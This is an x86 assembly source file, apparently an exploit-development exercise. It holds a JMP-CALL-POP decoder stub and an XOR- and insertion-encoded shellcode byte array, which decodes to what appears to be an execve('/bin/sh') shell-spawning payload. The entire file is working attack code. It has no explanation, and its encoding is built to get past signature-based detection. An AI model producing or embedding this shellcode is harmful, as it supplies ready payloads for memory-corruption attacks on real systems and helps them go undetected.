global _start ; Hi linker we are going to use _start as entry point of program
section .text

_start: ; entry point of program

	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi +1]
	xor eax, eax
	mov al, 1
	xor ebx, ebx
	xor byte [esi], 0x27

decode: 
	mov bl, byte [esi + eax]
	xor bl, 0xdd
	jz short EncodedShellcode
	mov bl, byte [esi + eax + 1]
	mov byte [edi], bl
	xor byte [edi], 0x27
	inc edi
	add al, 2
	jmp short decode
call_shellcode:

	call decoder
	EncodedShellcode: db 0x16,0x68,0xe7,0x68,0x77,0xea,0x4f,0x82,0x08,0xfb,0x08,0xbb,0x54,0xe0,0x4f,0x59,0x4f,0x80,0x08,0x9a,0x45,0x1a,0x4e,0xc1,0x49,0xbb,0xae,0xbf,0xc4,0xeb,0x77,0xb6,0xae,0xb2,0xc5,0xb1,0x74,0xf6,0xae,0x52,0xc6,0x96,0x97,0x04,0x2c,0xab,0xea,0xdb,0xa7,0x0e,0xdd,0xdd
